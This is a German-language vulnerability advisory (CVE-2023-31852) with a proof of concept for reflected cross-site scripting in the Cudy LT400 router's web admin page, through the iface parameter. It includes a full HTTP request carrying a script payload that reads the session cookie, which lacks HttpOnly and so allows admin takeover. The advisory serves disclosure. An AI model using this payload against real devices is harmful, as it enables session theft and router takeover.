
Proof-of-Concept für Reflected XSS in der Cudy LT400-Webverwaltungsoberfläche, die den Diebstahl von Sitzungstokens und die Übernahme des Administratorkontos über manipulierte Anfragen an /cgi-bin/luci/admin/network/wireless/config ermöglicht.
Eine reflektierte Cross-Site-Scripting (XSS)-Attacke existiert in der webbasierten Verwaltungsoberfläche des Cudy LT400.
Die Seite /cgi-bin/luci/admin/network/wireless/config weist eine reflektierte XSS über den Parameter iface auf.
Die Ausnutzungsmethoden beinhalten das Senden einer speziell gestalteten Anfrage an das Opfer, die bösartigen Code enthält.
Die betroffene Anwendung setzt das Session-Cookie nicht mit dem HttpOnly-Attribut; dies kann zur Übernahme des Administrators durch Diebstahl des Session-Tokens führen.
GET /cgi-bin/luci/admin/network/wireless/config?nomodal=&iface=wlan00%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3e HTTP/1.1
Host: 172.16.1.1
User-Agent: Mozilla/5.0
Accept: text/html, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://172.16.1.1/cgi-bin/luci/admin/setup
Cookie: sysauth=REDACTED
Shenzhen Cudy Technology
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31852